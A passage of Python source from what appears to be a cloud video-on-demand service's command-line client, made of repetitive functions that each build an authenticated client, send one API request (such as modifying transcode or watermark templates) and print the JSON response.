g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ProcessMediaByUrlRequest()
model.from_json_string(json.dumps(args))
rsp = client.ProcessMediaByUrl(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTranscodeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTranscodeTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyTranscodeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeContentReviewTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeContentReviewTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeContentReviewTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyWatermarkTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyWatermarkTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyWatermarkTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStorageDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeStorageDetailsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeStorageDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteWordSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteWordSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteWordSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateVodDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateVodDomainRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateVodDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateImageSpriteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateImageSpriteTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateImageSpriteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePersonSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePersonSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribePersonSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAIRecognitionTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAIRecognitionTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAIRecognitionTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateSubAppId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSubAppIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSubAppId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAnimatedGraphicsTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAnimatedGraphicsTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAnimatedGraphicsTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doForbidMediaDistribution(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ForbidMediaDistributionRequest()
model.from_json_string(json.dumps(args))
rsp = client.ForbidMediaDistribution(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doManageTask(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ManageTaskRequest()
model.from_json_string(json.dumps(args))
rsp = client.ManageTask(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySnapshotByTimeOffsetTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySnapshotByTimeOffsetTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySnapshotByTimeOffsetTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySuperPlayerConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySuperPlayerConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySuperPlayerConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateWordSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateWordSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateWordSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySubAppIdInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySubAppIdInfoRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySubAppIdInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAdaptiveDynamicStreamingTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAdaptiveDynamicStreamingTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAdaptiveDynamicStreamingTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyWordSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyWordSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyWordSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeImageSpriteTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImageSpriteTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeImageSpriteTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAllClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAllClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAllClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWatermarkTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWatermarkTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWatermarkTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateWatermarkTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateWatermarkTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateWatermarkTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAIRecognitionTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAIRecognitionTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAIRecognitionTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSuperPlayerConfigs(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSuperPlayerConfigsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSuperPlayerConfigs(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSubAppIds(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSubAppIdsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSubAppIds(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCommitUpload(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
